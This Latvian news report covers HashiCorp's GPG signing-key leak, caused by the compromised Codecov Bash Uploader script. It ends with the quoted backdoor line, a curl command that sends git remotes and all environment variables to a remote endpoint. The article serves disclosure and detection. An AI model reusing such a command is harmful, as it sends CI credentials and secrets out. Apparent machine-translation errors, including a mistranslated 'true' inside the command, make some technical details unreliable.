HashiCorp, kas pazīstams ar atvērtā pirmkoda rīku Vagrant, Packer, Nomad un Terraform izstrādi, paziņoja par privātās GPG atslēgas noplūdi, ko izmanto, lai izveidotu digitālos parakstus, kas pārbauda izlaidumus. Uzbrucēji, kuri ieguva piekļuvi GPG atslēgai, varētu veikt slēptas izmaiņas HashiCorp produktos, pārbaudot tos ar pareizu ciparparakstu. Vienlaikus uzņēmums norādīja, ka audita laikā nav konstatētas pēdas mēģinājumiem veikt šādas modifikācijas.
Pašlaik uzlauztā GPG atslēga ir atsaukta un tās vietā ir ieviesta jauna atslēga. Problēma skāra tikai verifikāciju, izmantojot SHA256SUM un SHA256SUM.sig failus, un neietekmēja ciparparakstu ģenerēšanu Linux DEB un RPM pakotnēm, kas piegādātas caur releases.hashicorp.com, kā arī laidiena verifikācijas mehānismus operētājsistēmām MacOS un Windows (AuthentiCode) .
Noplūde notika, jo infrastruktūrā tika izmantots Codecov Bash Uploader (codecov-bash) skripts, kas paredzēts, lai lejupielādētu pārklājuma pārskatus no nepārtrauktas integrācijas sistēmām. Uzbrukuma laikā uzņēmumam Codecov norādītajā skriptā tika paslēptas aizmugures durvis, caur kurām uzbrucēju serverim tika nosūtītas paroles un šifrēšanas atslēgas.
Lai uzlauztu, uzbrucēji izmantoja kļūdu Codecov Docker attēla izveides procesā, kas ļāva viņiem iegūt piekļuves datus GCS (Google Cloud Storage), kas nepieciešami, lai veiktu izmaiņas Bash Uploader skriptā, kas izplatīts no codecov.io. tīmekļa vietne. Izmaiņas tika veiktas jau 31. janvārī, tās palika nepamanītas divus mēnešus un ļāva uzbrucējiem iegūt informāciju, kas glabājas klientu nepārtrauktās integrācijas sistēmu vidēs. Izmantojot pievienoto ļaunprātīgo kodu, uzbrucēji varēja iegūt informāciju par pārbaudīto Git repozitoriju un visiem vides mainīgajiem, tostarp marķieriem, šifrēšanas atslēgas un paroles, kas tiek pārsūtītas uz nepārtrauktas integrācijas sistēmām, lai organizētu piekļuvi lietojumprogrammas kodam, krātuvēm un pakalpojumiem, piemēram, Amazon Web Services un GitHub.
Papildus tiešajam izsaukumam Codecov Bash Uploader skripts tika izmantots kā daļa no citiem augšupielādētājiem, piemēram, Codecov-action (Github), Codecov-circleci-orb un Codecov-bitrise-step, kuru lietotājus arī skar problēma. Visiem Codecov-bash un saistīto produktu lietotājiem ir ieteicams pārbaudīt savas infrastruktūras, kā arī mainīt paroles un šifrēšanas atslēgas. Aizmugures durvju esamību skriptā varat pārbaudīt, izmantojot līniju curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || taisnība
Avots: opennet.ru